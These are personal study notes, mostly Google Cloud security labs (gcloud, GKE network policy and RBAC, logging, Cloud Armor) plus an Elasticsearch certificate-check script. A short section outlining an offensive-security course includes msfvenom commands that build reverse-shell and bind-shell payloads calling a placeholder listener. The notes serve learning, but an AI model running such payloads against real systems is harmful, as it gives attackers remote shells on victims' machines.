Encrypting VM disks with customer-supplied encryption keys

Module 7: Securing cloud data: techniques and best practices
Cloud Storage and IAM permissions
Cloud Storage and ACLs
Auditing cloud data, including finding and remediating publicly accessible data
Signed Cloud Storage URLs
Signed policy documents
Encrypting Cloud Storage objects with customer-managed encryption keys and with customer-supplied encryption keys
Best practices, including deleting archived versions of objects after key rotation
BigQuery authorized views
BigQuery IAM roles
Best practices, including preferring IAM permissions over ACLs
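Signed Cloud Storage URLs from Module 7 are one gsutil call; bucket, object, and key file below are placeholders:

```shell
# Time-limited (10 minute) read access to a single object,
# signed with a service account key
gsutil signurl -d 10m service-account-key.json gs://my-bucket/report.csv
```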

Module 8: Protecting against Distributed Denial of Service Attacks: techniques and best practices
How DDoS attacks work
Mitigations: GCLB, Cloud CDN, autoscaling, VPC ingress and egress firewalls, Cloud Armor
Types of complementary partner products
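A minimal Cloud Armor sketch for the edge-layer mitigations above (policy name and CIDR are made up):

```shell
gcloud compute security-policies create block-bad-cidr

gcloud compute security-policies rules create 1000 \
    --security-policy block-bad-cidr \
    --src-ip-ranges "203.0.113.0/24" \
    --action "deny-403"
```

Attach the policy to a backend service with gcloud compute backend-services update ... --security-policy so GCLB enforces it at the edge.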

Module 9: Application Security: techniques and best practices
Types of application security vulnerabilities
DoS protections in App Engine and Cloud Functions
Cloud Security Scanner
Threat: Identity and OAuth phishing
Identity Aware Proxy

Module 10: Content-related vulnerabilities: techniques and best practices
Threat: Ransomware
Mitigations: Backups, IAM, Data Loss Prevention API
Threats: Data misuse, privacy violations, sensitive/restricted/unacceptable content
Mitigations: Classifying content using Cloud ML APIs; scanning and redacting data using Data Loss Prevention API

G NOOB

Bringing more order to this madness

=>
=> Security in Google Cloud Platform Specialization
=>

=> 1 Google Cloud Platform Fundamentals: Core Infrastructure
- GCP, GCE, GCS, GKE, GAE, BQ, ML
=> 2 Managing Security in Google Cloud Platform
- Cloud ID, IAM, VPC sec
=> 3 Security Best Practices in Google Cloud
- Service accounts, IAM roles, GCE best practices
=> 4 Mitigating Security Vulnerabilities on Google Cloud Platform
Protecting against Distributed Denial of Service Attacks
- Cloud Armor (App, DDOS defense), DLP API, Security Command Center, Stackdriver Monitoring and Logging, Forseti

Udemy Offensive Security Engineering

https://github.com/3ndG4me/Offensive-Security-Engineering-Udemy

Section 1: Introduction
-> AWS Primer
Section 2: Networks Refresher
Section 3: Basics of Command and Control (C2)
-> Client/Server
-> Bind connection: listener opens on the target; the operator connects in. msf bind_tcp
-> Reverse connection: the target dials out to the operator, c2 server<-4444-client. msf reverse_tcp
Section 4: Reverse VPN Tunnelling
-> AWS terraform
Section 5: Infrastructure Operations
-> Devops
-> Terraform
-> SaltStack (master/minion). SaltStack C
Section 6: Red Teams
-> TTPs. Threat emulation.
Section 7: Red Team Operations
Section 8: Scenarios Introduction
Section 9: Scenario 1 - Classic Exploitation
https://github.com/3ndG4me/Offensive-Security-Engineering-Udemy/tree/master/base-c2
Section 10: Scenario 2 - The Dropbox
post-exploit: Empire. Merlin.
Section 11: Scenario 3 - Phishing Attacks and
-> Golang
-> Gophish
-> C2 Redirectors with AWS Lambda
Section 12: Bonus Scenario - Multiplayer C2
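The bind vs reverse split from Section 3 shows up directly in Metasploit payload names; a msfvenom sketch (LHOST/LPORT are placeholders):

```shell
# Reverse shell: target dials out to the C2 listener
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o rev.elf

# Bind shell: target opens a listener, operator connects in
msfvenom -p linux/x64/shell_bind_tcp LPORT=4444 -f elf -o bind.elf
```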

python
go
empire
gophish
mitre ttp documentation

K8s

index.html

Hello world!

testing ground

Note to date.

  • PKCS#12
  • Search Guard 101
  • Elasticsearch & Nginx
  • Quick Start Elastic APM Server & Python Agent
  • Logstash TNT
  • Snapshot/Restore w/ GCS

Google Learning

osdfir.blogspot.com

Google training

Google Cloud introduces VPC Flow Logs for more network visibility.
It provides network telemetry for GCP environments, creating logs in five-second intervals.
Users can collect telemetry from a specific VPC (virtual private cloud) network, a subnet, or a specific VM instance or virtual interface.
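Enabling VPC Flow Logs on an existing subnet is a one-liner; the subnet name and region here are assumptions:

```shell
gcloud compute networks subnets update my-subnet \
    --region europe-west2 \
    --enable-flow-logs
```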
=> GSP001 Creating a Virtual Machine
gcloud auth list
gcloud config list project
GCE > new vm > n1-standard-2
gcloud compute instances create gcelab1 --machine-type n1-standard-2 --zone us-central1-c
apt-get update
apt-get install nginx -y
ps auwx | grep nginx
gcloud compute instances create gcelab2 --machine-type n1-standard-2 --zone us-central1-c
gcloud compute ssh gcelab2 --zone us-central1-c

=> GSP002 Getting Started with Cloud Shell & gcloud
Start Cloud Shell
Understanding Regions and Zones
Initializing Cloud SDK
The gcloud CLI is a part of the Google Cloud SDK. You need to download and install the SDK on your own system and initialize it (by running gcloud init) before you can use the gcloud command-line tool.
The gcloud CLI is automatically available in Cloud Shell. Since you're using Cloud Shell for this lab, you don't need to install gcloud manually.
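Outside Cloud Shell, the bootstrap described above looks roughly like:

```shell
# On your own machine (Cloud Shell already has all of this)
gcloud init            # pick account, default project, region/zone
gcloud auth list       # confirm the active account
gcloud components list # see which SDK components are installed
```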

HERE FOR REGIONS AND ZONES DOC:
https://cloud.google.com/compute/docs/regions-zones
europe-west2 is London, with zones a,b,c

Setting environment variables
export PROJECT_ID=qwiklabs-gcp-01-29c2063fd69a
export ZONE=europe-west2-a
echo $PROJECT_ID, $ZONE
Create a virtual machine with gcloud
gcloud compute instances create gcelab2 --machine-type n1-standard-2 --zone $ZONE
Using gcloud commands
gcloud -h
gcloud config --help
gcloud help config
gcloud config list
gcloud config list --all
gcloud components list
Auto-completion
gcloud components install beta
gcloud beta interactive
gcloud compute instances describe gcelab2
SSH into your vm instance
gcloud compute ssh gcelab2 --zone $ZONE
exit
Use the Home directory
cd $HOME
vi ./.bashrc
:wq
=> GSP007 Set Up Network and HTTP Load Balancers
gcloud auth list
gcloud config list project
gcloud config set compute/region europe-west2
gcloud config set compute/zone europe-west2-a
cat << EOF > startup.sh
#! /bin/bash
apt-get update
apt-get install -y nginx
service nginx start
sed -i -- 's/nginx/Google Cloud Platform - '"\$HOSTNAME"'/' /var/www/html/index.nginx-debian.html
EOF

gcloud compute instance-templates create nginx-template \
         --metadata-from-file startup-script=startup.sh

gcloud compute target-pools create nginx-pool

gcloud compute instance-groups managed create nginx-group \
         --base-instance-name nginx \
         --size 2 \
         --template nginx-template \
         --target-pool nginx-pool

gcloud compute instances list
gcloud compute firewall-rules create www-firewall --allow tcp:80
gcloud compute instances list
Now get on via a browser to the external IPs
Create a Network Load Balancer
Create an L3 network load balancer targeting your instance group:
gcloud compute forwarding-rules create nginx-lb \
         --region europe-west2 \
         --ports=80 \
         --target-pool nginx-pool
gcloud compute forwarding-rules list

Create an HTTP(S) Load Balancer
Health checks verify that the instance is responding to HTTP or HTTPS traffic:
gcloud compute http-health-checks create http-basic-check
Define an HTTP service and map a port name to the relevant port for the instance group. Now the load balancing service can forward traffic to the named port:
gcloud compute instance-groups managed \
       set-named-ports nginx-group \
       --named-ports http:80
Create a backend service:
gcloud compute backend-services create nginx-backend \
     --protocol HTTP --http-health-checks http-basic-check --global
Add the instance group into the backend service:
gcloud compute backend-services add-backend nginx-backend \
   --instance-group nginx-group \
   --instance-group-zone europe-west2-a \
   --global
Create a default URL map that directs all incoming requests to all your instances:
gcloud compute url-maps create web-map \
   --default-service nginx-backend
Create a target HTTP proxy to route requests to your URL map:
gcloud compute target-http-proxies create http-lb-proxy \
   --url-map web-map
Create a global forwarding rule to handle and route incoming requests. A forwarding rule sends traffic to a specific target HTTP or HTTPS proxy depending on the IP address, IP protocol, and port specified. The global forwarding rule does not support multiple ports:
gcloud compute forwarding-rules create http-content-rule \
        --global \
        --target-http-proxy http-lb-proxy \
        --ports 80
gcloud compute forwarding-rules list
Take note of the http-content-rule IP_ADDRESS for the forwarding rule, browse to it.
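To script the "browse to it" step, the frontend IP can be pulled from the forwarding rule and polled until the backends answer (global LB propagation can take a few minutes):

```shell
IP=$(gcloud compute forwarding-rules describe http-content-rule \
       --global --format='value(IPAddress)')
until curl -s --max-time 5 "http://${IP}/"; do sleep 5; done
```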
=> GSP112 Cloud (web) Security Scanner: Qwik Start
git clone https://github.com/GoogleCloudPlatform/python-docs-samples
cd python-docs-samples/appengine/standard_python37/hello_world
dev_appserver.py app.yaml
shell > web preview on :8080
gcloud app deploy
[7] europe-west 
gcloud app browse
https://qwiklabs-gcp-04-fa39a019c814.ew.r.appspot.com
Navigation menu > App Engine > Security scans
Enable API > Create scan > update > save > run.
=> GSP282 A Tour of Qwiklabs and the Google Cloud Platform
Compute: houses a variety of machine types that support any type of workload. The different computing options let you decide how involved you want to be with operational details and infrastructure amongst other things.
Storage: data storage and database options for structured or unstructured, relational or non relational data.
Networking: services that balance application traffic and provision security rules amongst other things.
Stackdriver: a suite of cross-cloud logging, monitoring, trace, and other service reliability tools.
Tools: services for developers managing deployments and application build pipelines.
Big Data: services that allow you to process and analyze large datasets.
Artificial Intelligence: a suite of APIs that run specific artificial intelligence and machine learning tasks on the Google Cloud platform.
=> GSP610 Fundamentals of Stackdriver Logging
gcloud auth list
gcloud config list project
git clone https://github.com/GoogleCloudPlatform/getting-started-python
cd getting-started-python/bookshelf
virtualenv -p python3 env
source env/bin/activate
pip3 install -r requirements.txt
gcloud app deploy
[7] europe-west  (supports standard and flexible)
Firestore > Datastore page > SWITCH TO NATIVE MODE, and click SWITCH MODES to confirm.
gcloud app deploy
gcloud app browse
https://qwiklabs-gcp-02-190869f1bc82.ew.r.appspot.com/
create a new book in the app
Select Navigation menu> Logging> Logs Viewer.
GAE Application/All logs/Any log level
In the Filter by label or text search dropdown, select Convert to advanced filter.
`
resource.type="gae_app"
resource.labels.module_id="default"
add protoPayload.latency>=0.01s
`
Still in Logs Viewer, in the select service dropdown, select GAE Application > Default Service > All version_id.
In the log list, click on the status "200" (in any row that has 200) and select Show matching entries. aka protoPayload.status: 200
Create a monitoring metric based on your filter:
User-defined Metrics section > view in Metrics Explorer.
From the left menu, select Monitoring Overview. The log metrics are shown in charts.
Stacked area format looks cool!
Navigation menu > Compute Engine > VM instances.
Create vm g1-small, with HTTP traffic allowed
Viewing audit logs in Activity Viewer
Click on GCP > Activity (https://console.cloud.google.com/home/activity)
Viewing audit logs in Cloud Logs Viewer. Navigation menu > Logging > Logs Viewer
GCE VM Instance > All instance_id
`
resource.type="gce_instance"
`
logs selector dropdown, select cloudaudit.googleapis.com/activity
`
resource.type="gce_instance"
logName="projects/qwiklabs-gcp-02-190869f1bc82/logs/cloudaudit.googleapis.com%2Factivity"
`
remove resource.type="gce_instance"
filter to find and or add by adv Filter
protoPayload.authenticationInfo.principalEmail="[email protected]"
Exporting logs > Creating an export job
Remove line 2, so we just have logName..
Create Sink > name: AuditLogs, service: BigQuery, dest: Create new BigQuery dataset and then name the new BigQuery dataset "AuditLogs" and click Create.
Viewing audit logs in BigQuery. Navigation menu > BigQuery.
find the VM and its auditlogs, now back to the VM, hit edit.
Check the checkbox for Enable connecting to serial ports.
Scroll down and check the checkbox to Allow HTTPS traffic.
Return to the BigQuery console (Navigation menu > BigQuery) and expand the AuditLogs dataset. You might need to refresh the page. You should see that a new cloudaudit table has been created in the dataset. Click the new table.
Click the new cloudaudit table, then click the Query Table button.
`
SELECT
timestamp,
resource.type,
protopayload_auditlog.authenticationInfo.principalEmail,
protopayload_auditlog.methodName
FROM `qwiklabs-gcp-02-190869f1bc82.AuditLogs.cloudaudit_googleapis_com_activity_20200505`
WHERE protopayload_auditlog.authenticationInfo.principalEmail = "[email protected]"
LIMIT 1000
`
=> GSP483 Logging with Stackdriver on Kubernetes Engine
gcloud auth list
gcloud config list project
Open a new session in Cloud Shell. Now open the code editor by clicking the icon in the top ribbon.
gcloud config set project qwiklabs-gcp-04-e9c7a084c5db
git clone https://github.com/GoogleCloudPlatform/gke-logging-sinks-demo
cd gke-logging-sinks-demo
gcloud config set compute/region europe-west
gcloud config set compute/zone europe-west
/home/student_04_33a238f10f2c/gke-logging-sinks-demo/terraform
Remove the provider version for the Terraform from the provider.tf script file.
From the left-hand menu, open the file /gke-logging-sinks-demo/terraform/provider.tf.
Set the version to ~> 2.19.0. After modification your provider.tf script file should look like:
....
provider "google" {
  project = var.project
  version = "~> 2.19.0"
}
Save the file. VI this stuff :shaka:
There are three Terraform files provided with this lab example. The first one, main.tf, is the starting point for Terraform. It describes the features that will be used, the resources that will be manipulated, and the outputs that will result. The second file is provider.tf, which indicates which cloud provider and version will be the target of the Terraform commands--in this case GCP.
The final file is variables.tf, which contains a list of variables that are used as inputs into Terraform. Any variables referenced in the main.tf that do not have defaults configured in variables.tf will result in prompts to the user at runtime.
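make create drives Terraform under the hood; my rough guess at the equivalent manual steps (not verified against this repo's Makefile):

```shell
cd terraform
terraform init                               # fetch the google provider
terraform plan -var "project=${PROJECT_ID}"  # prompts for any variable lacking a default
terraform apply
```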
You will make one small change to main.tf. From the left-hand menu, open the file /gke-logging-sinks-demo/terraform/main.tf. Scroll down to line 106 and find the "Create the Stackdriver Export Sink for Cloud Storage GKE Notifications" section.

Change the filter's resource.type from container to k8s_container.
Do the same for the bigquery-sink below on line 116. Ensure that these two export sink sections look like the following before moving on.
make create
Note: If you get deprecation warnings related to the zone variable, please ignore them and move forward in the lab.
for me just now it didn't like europe-west, so:
gcloud config set compute/region us-central1
gcloud config set compute/zone us-central1-a
ftw
had to mv terraform.tfvars terraform.tfvars.bak
then
make create :)
make validate
Your output will look like:
kubeconfig entry generated....
Generating Logs
The sample application that Terraform deployed serves up a simple web page. Each time you open this application in your browser the application will publish log events to Stackdriver Logging. Refresh the page a few times to produce several log events.
Navigation menu > Network services > Load balancing > Load balancer details > Frontend
Logs in Stackdriver
Navigation menu > Logging > Kubernetes Container > stackdriver-logging > default (stackdriver-logging is the cluster and default is the namespace).
flip the view the see newest at top, visit the app website few times and see the logging.
Viewing Log Exports. The Terraform configuration built out two Log Export Sinks.
To view the sinks perform the following steps. Stackdriver -> Logging page.
(https://console.cloud.google.com/logs/exports)
You can edit or create new sinks.
Logs in Cloud Storage. Log events can be stored in Cloud Storage, an object storage system suitable for archiving data. Policies can be configured for Cloud Storage buckets that, for instance, allow aging data to expire and be deleted while more recent data can be stored with a variety of storage classes affecting price and availability.
The Terraform configuration created a Cloud Storage Bucket named stackdriver-gke-logging- to which logs will be exported for medium to long-term archival. In this example, the Storage Class for the bucket is defined as Nearline because the logs should be infrequently accessed in a normal production environment (this will help to manage the costs of medium-term storage). In a production scenario, this bucket may also include a lifecycle policy that moves the content to Coldline storage for cheaper long-term storage of logs.
Storage > Browser > stackdriver-gke-logging-...
Logs in BigQuery. Navigation > BigQuery > gke_logs_dataset (check under here for the logs)
Click on Query Table
have a look at the data.
make teardown

Troubleshooting for your production environment.
1. The install script fails with "Permission denied" when running Terraform: run gcloud auth application-default login and retry.
2. Cloud Storage bucket not populated: once the Terraform configuration is complete the Cloud Storage bucket will be created, but it is not always populated immediately with log data from the Kubernetes Engine cluster. Give the process some time; it can take 2 to 3 hours before the first entries start appearing (https://cloud.google.com/logging/docs/export/using_exported_logs).
=> GSP151 Cloud SQL for MySQL: Qwik Start
Storage > SQL > Create Instance > MySQL > Second Generation
Connect to your instance using the mysql client in the Cloud Shell
gcloud sql connect myinstance --user=root
CREATE DATABASE guestbook;
USE guestbook;
CREATE TABLE entries (guestName VARCHAR(255), content VARCHAR(255),
    entryID INT NOT NULL AUTO_INCREMENT, PRIMARY KEY(entryID));
    INSERT INTO entries (guestName, content) values ("first guest", "I got here!");
INSERT INTO entries (guestName, content) values ("second guest", "Me too!");
SELECT * FROM entries;
=> GSP076 AI Platform: Qwik Start
What you will build
The sample builds a wide and deep model for predicting income category based on the United States Census Income Dataset. The two income categories (also known as labels) are:

>50K — Greater than 50,000 dollars
<=50K — Less than or equal to 50,000 dollars
Wide and deep models use deep neural nets (DNNs) to learn high-level abstractions about complex features or interactions between such features. These models then combine the outputs from the DNN with a linear regression performed on simpler features. This provides a balance between power and speed that is effective on many structured data problems.

The sample defines the model using TensorFlow 1.x's prebuilt DNNCombinedLinearClassifier class. The sample defines the data transformations particular to the census dataset, then assigns these (potentially) transformed features to either the DNN or the linear portion of the model.

gcloud auth list
gcloud config list project
Create a virtual environment:
sudo apt-get update
sudo apt-get install virtualenv -y
virtualenv -p python3 venv
source venv/bin/activate
Clone the example repo:
git clone https://github.com/GoogleCloudPlatform/cloudml-samples.git
cd cloudml-samples/census/estimator
Develop and validate your training application locally:
mkdir data
gsutil -m cp gs://cloud-samples-data/ml-engine/census/data/* data/
export TRAIN_DATA=$(pwd)/data/adult.data.csv
export EVAL_DATA=$(pwd)/data/adult.test.csv
head data/adult.data.csv
Install dependencies:
pip install -r ../requirements.txt
pip install pandas==0.24.2
python -c "import tensorflow as tf; print('TensorFlow version {} is installed.'.format(tf.__version__))"
Run a local training job:
export MODEL_DIR=output
gcloud ai-platform local train \
    --module-name trainer.task \
    --package-path trainer/ \
    --job-dir $MODEL_DIR \
    -- \
    --train-files $TRAIN_DATA \
    --eval-files $EVAL_DATA \
    --train-steps 1000 \
    --eval-steps 100
Inspect the summary logs using Tensorboard:
tensorboard --logdir=$MODEL_DIR --port=8080
ls output/export/census/
gcloud ai-platform local predict \
--model-dir output/export/census/<timestamp> \
--json-instances ../test.json
1589229630
GCS:
PROJECT_ID=$(gcloud config list project --format "value(core.project)")
BUCKET_NAME=${PROJECT_ID}-mlengine
echo $BUCKET_NAME
REGION=us-central1
gsutil mb -l $REGION gs://$BUCKET_NAME
gsutil cp -r data gs://$BUCKET_NAME/data
TRAIN_DATA=gs://$BUCKET_NAME/data/adult.data.csv
EVAL_DATA=gs://$BUCKET_NAME/data/adult.test.csv
gsutil cp ../test.json gs://$BUCKET_NAME/data/test.json
TEST_JSON=gs://$BUCKET_NAME/data/test.json
single-instance trainer in the cloud:
JOB_NAME=census_single_1
OUTPUT_PATH=gs://$BUCKET_NAME/$JOB_NAME
gcloud ai-platform jobs submit training $JOB_NAME \
    --job-dir $OUTPUT_PATH \
    --runtime-version 1.14 \
    --python-version 3.5 \
    --module-name trainer.task \
    --package-path trainer/ \
    --region $REGION \
    -- \
    --train-files $TRAIN_DATA \
    --eval-files $EVAL_DATA \
    --train-steps 1000 \
    --eval-steps 100 \
    --verbosity DEBUG
gcloud ai-platform jobs stream-logs $JOB_NAME
gsutil ls -r $OUTPUT_PATH
tensorboard --logdir=$OUTPUT_PATH --port=8080
Deploy your model to support prediction:
MODEL_NAME=census
gcloud ai-platform models create $MODEL_NAME --regions=$REGION
gsutil ls -r $OUTPUT_PATH/export
MODEL_BINARIES=$OUTPUT_PATH/export/census/<timestamp>/
gcloud ai-platform versions create v1 \
--model $MODEL_NAME \
--origin $MODEL_BINARIES \
--runtime-version 1.14 \
--python-version 3.5
gcloud ai-platform models list
Send an online prediction request to your deployed model:
gcloud ai-platform predict \
--model $MODEL_NAME \
--version v1 \
--json-instances ../test.json
=>
=> Google Kubernetes Engine Best Practices: Security
=>

=> GSP480 How to Use a Network Policy on Google Kubernetes Engine
The Principle of Least Privilege
three workloads:

1. hello-server: this is a simple HTTP server with an internally-accessible endpoint
2. hello-client-allowed: this is a single pod that repeatedly attempts to access hello-server. The pod is labeled such that the Network Policy will allow it to connect to hello-server.
3. hello-client-blocked: this runs the same code as hello-client-allowed but the pod is labeled such that the Network Policy will not allow it to connect to hello-server.
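Once the manifests are applied, a quick way to sanity-check what a policy matches (the policy name is whatever the demo's manifest defines):

```shell
kubectl get networkpolicy
kubectl get pods --show-labels
kubectl describe networkpolicy <name>   # shows the podSelector and allowed ingress peers
```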

gcloud auth list
gcloud config list project
git clone https://github.com/GoogleCloudPlatform/gke-network-policy-demo.git
cd gke-network-policy-demo
gcloud config set compute/region us-central1
gcloud config set compute/zone us-central1-a
make setup-project
cat terraform/terraform.tfvars
sed -i 's/~> 2.10.0/~> 2.14.0/g' terraform/provider.tf
make tf-apply
gcloud container clusters describe gke-demo-cluster | grep  -A2 networkPolicy
gcloud compute ssh gke-demo-bastion
kubectl apply -f ./manifests/hello-app/
kubectl get pods
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=hello)
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=not-hello)
Restricting access with a Network Policy:
kubectl apply -f ./manifests/network-policy.yaml
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=not-hello)
Restricting namespaces with Network Policies:
kubectl delete -f ./manifests/network-policy.yaml
kubectl create -f ./manifests/network-policy-namespaced.yaml
kubectl logs --tail 10 -f $(kubectl get pods -oname -l app=hello)
kubectl -n hello-apps apply -f ./manifests/hello-app/hello-client.yaml
validate:
kubectl logs --tail 10 -f -n hello-apps $(kubectl get pods -oname -l app=hello -n hello-apps)
teardown:
exit
make teardown


=> GSP493 Using Role-based Access Control in Kubernetes Engine
gcloud config list project
gcloud config set compute/region us-central1
gcloud config set compute/zone us-central1-a
git clone https://github.com/GoogleCloudPlatform/gke-rbac-demo.git
cd gke-rbac-demo
Edit the file gke-rbac-demo/terraform/provider.tf using the Cloud Shell editor and update the version for Terraform to the latest stable version, 2.12.0
// Configures the default project and zone for underlying Google Cloud API calls
provider "google" {
  project = var.project
  zone    = var.zone
  version = "~> 2.12.0"
}
make create
Assigning permissions by user persona:
gcloud iam service-accounts list
gcloud compute instances list
gcloud compute ssh gke-tutorial-admin
kubectl apply -f ./manifests/rbac.yaml
gcloud compute ssh gke-tutorial-owner
kubectl create -n dev -f ./manifests/hello-server.yaml
kubectl create -n prod -f ./manifests/hello-server.yaml
kubectl create -n test -f ./manifests/hello-server.yaml
kubectl get pods -l app=hello-server --all-namespaces
gcloud compute ssh gke-tutorial-auditor
kubectl get pods -l app=hello-server --all-namespaces
kubectl get pods -l app=hello-server --namespace=dev
kubectl get pods -l app=hello-server --namespace=test
kubectl get pods -l app=hello-server --namespace=prod
kubectl create -n dev -f manifests/hello-server.yaml
kubectl delete deployment -n dev -l app=hello-server
Assigning API permissions to a cluster application:
kubectl apply -f manifests/pod-labeler.yaml
Diagnosing an RBAC misconfiguration:
kubectl get pods -l app=pod-labeler
kubectl describe pod -l app=pod-labeler | tail -n 20
kubectl logs -l app=pod-labeler
Fixing the serviceAccountName:
kubectl get pod -oyaml -l app=pod-labeler
grep serviceAccount pod-labeler-fix-1.yaml --color
admin vm:
kubectl apply -f manifests/pod-labeler-fix-1.yaml
kubectl get deployment pod-labeler -oyaml
insufficient privileges:
pod status:
kubectl get pods -l app=pod-labeler
pod logs:
kubectl logs -l app=pod-labeler
logging:
protoPayload.methodName="io.k8s.core.v1.pods.patch"
Identifying the application's role and permissions:
kubectl get rolebinding pod-labeler -oyaml
inspect role:
kubectl get role pod-labeler -oyaml
grep verbs manifests/pod-labeler-fix-2.yaml --color
kubectl apply -f manifests/pod-labeler-fix-2.yaml
see changes:
kubectl get role pod-labeler -oyaml
kubectl delete pod -l app=pod-labeler
kubectl get pods --show-labels
kubectl logs -l app=pod-labeler
teardown:
make teardown















ssl

SSL/TLS troubleshooting script
Elastic Stack v6.3.0

Create and test on single node with P12 (PKCS#12) bundle.

$ egrep '^[^#]+' config/elasticsearch.yml 
cluster.name: moshimoshi
http.port: 9200

$ egrep '^[^#]+' config/kibana.yml 
server.port: 5601
elasticsearch.url: "http://localhost:9200"
$ bin/elasticsearch &
$ bin/kibana &
$ curl localhost:9200
{
  "name" : "jtu_hbG",
  "cluster_name" : "moshimoshi",
  "cluster_uuid" : "AZx4bkBdTOGxrFvlk17hlA",
  "version" : {
    "number" : "6.3.0",
    "build_flavor" : "default",
    "build_type" : "zip",
    "build_hash" : "424e937",
    "build_date" : "2018-06-11T23:38:03.357887Z",
    "build_snapshot" : false,
    "lucene_version" : "7.3.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

$ curl -XGET localhost:9200/_xpack/ssl/certificates
[]

Stop Elasticsearch, Kibana.

$ bin/x-pack/certutil ca
$ bin/elasticsearch-certutil ca
$ bin/elasticsearch-certutil cert -ca elastic-stack-ca.p12 

$ mv elastic-* config/

$ ll config/
-rw-------   1 khondhu  staff  3440  9 Jul 17:14 elastic-certificates.p12
-rw-------   1 khondhu  staff  2524  9 Jul 17:14 elastic-stack-ca.p12

Update yaml.

$ egrep '^[^#]+' config/elasticsearch.yml 

cluster.name: moshimoshi
http.port: 9200
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.keystore.path: /Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12
xpack.security.transport.ssl.truststore.path: /Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12
$ bin/elasticsearch &
$ bin/kibana &

SSL Certificate API docs here.

$ curl -XGET localhost:9200/_xpack/ssl/certificates?pretty
[
  {
    "path" : "/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12",
    "format" : "PKCS12",
    "alias" : "instance",
    "subject_dn" : "CN=instance",
    "serial_number" : "7f17d25c9662dd9306482db4521497ad8f86fd65",
    "has_private_key" : true,
    "expiry" : "2021-07-08T16:14:39.000Z"
  },
  {
    "path" : "/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12",
    "format" : "PKCS12",
    "alias" : "ca",
    "subject_dn" : "CN=Elastic Certificate Tool Autogenerated CA",
    "serial_number" : "2b683fe55fc0ab03765244cc4f03bbdbd78f4f85",
    "has_private_key" : false,
    "expiry" : "2021-07-08T16:14:07.000Z"
  },
  {
    "path" : "/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12",
    "format" : "PKCS12",
    "alias" : "instance",
    "subject_dn" : "CN=Elastic Certificate Tool Autogenerated CA",
    "serial_number" : "2b683fe55fc0ab03765244cc4f03bbdbd78f4f85",
    "has_private_key" : false,
    "expiry" : "2021-07-08T16:14:07.000Z"
  }
]

Iteration 1.

$ touch certCheckTool.sh 
$ chmod +x certCheckTool.sh 
$ vi certCheckTool.sh

#!/bin/sh
#title           :certCheckTool.sh
#description     :Script for Elasticsearch cluster SSL/TLS bundle discovery
#author		 :Jymit Singh Khondhu
#date            :7/7/2018
RED='\033[0;31m'
NC='\033[0m' # No Color
USER=$(whoami)   # command substitution, otherwise the literal string "whoami" prints


echo "Hello ${RED}${USER} ${NC}";
#echo "The date time right now is: date '+%D %T'"
sleep 1;
printf "The Elasticsearch cluster name is: ";
curl -s -XGET localhost:9200/_cluster/health?pretty |grep -i cluster_name |awk '{print $3}'| cut -f2 -d\"
sleep 2;

#echo "Check if SSL/TLS is enabled"
#sleep 2;
#printf "Getting the output to the _xpack/ssl/certificates API. ";
#sleep 2;
#curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty

printf "What SSL/TLS bundle is in use here: ";
curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty |grep format |uniq -c |awk '{print $4}'| cut -f2 -d\"
sleep 2;

echo "The path to the bundle location on node xxx is: "
curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty |grep path |uniq |awk '{print $3}'| cut -f2 -d\"
sleep 2;
#This needs improvement for multi-node environments, however it gives an indication of where the CA/cert bundles could reside

echo .
sleep 1;
echo .
sleep 1;
echo .
sleep 1;
echo "Please have your ca/cert passphrase at hand"
echo "You are using a PKCS#12 bundle"
echo "So we shall go for: "
curl -s -XGET localhost:9200/_xpack/ssl/certificates?pretty |grep path |uniq |awk '{print $3}'| cut -f2 -d\" |xargs openssl pkcs12 -info -in
$ ./certCheckTool.sh 

Hello khondhu 
The Elasticsearch cluster name is: moshimoshi
What SSL/TLS bundle is in use here: PKCS12
The path to the bundle location on node xxx is: 
/Users/khondhu/Desktop/elastic/workSpace/v630/elasticsearch-6.3.0/config/elastic-certificates.p12
.
.
.
Please have your ca/cert passphrase at hand
You are using a PKCS#12 bundle
So we shall go for: 
Enter Import Password:
MAC Iteration 1024
MAC verified OK
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
Key Attributes: <No Attributes>
Enter PEM pass phrase:
PKCS7 Encrypted data: pbeWithSHA1And40BitRC2-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: instance
    localKeyID: 54 69 6D 65 20 31 35 33 31 31 35 32 38 38 30 36 36 34 
subject=/CN=instance
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
8=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
    friendlyName: ca
    2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=/CN=Elastic Certificate Tool Autogenerated CA
issuer=/CN=Elastic Certificate Tool Autogenerated CA
-----BEGIN CERTIFICATE-----
MI
Y=
-----END CERTIFICATE-----

.
..
.
..
.
..
.
..
.
Other things to note and work on.

$ bin/elasticsearch-certutil cert --pem
$ unzip certificate-bundle.zip
$ openssl verify -verbose -CAfile ../ca/ca.crt instance.crt
instance.crt: OK

Troubleshooting things to add.
PEM single node cluster v624 SSL/TLS for HTTP & TRANSPORT:

$ egrep '^[^#]+' config/elasticsearch.yml 

cluster.name: khondhu
node.name: khondhu-monitoring
http.port: 9201
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate 
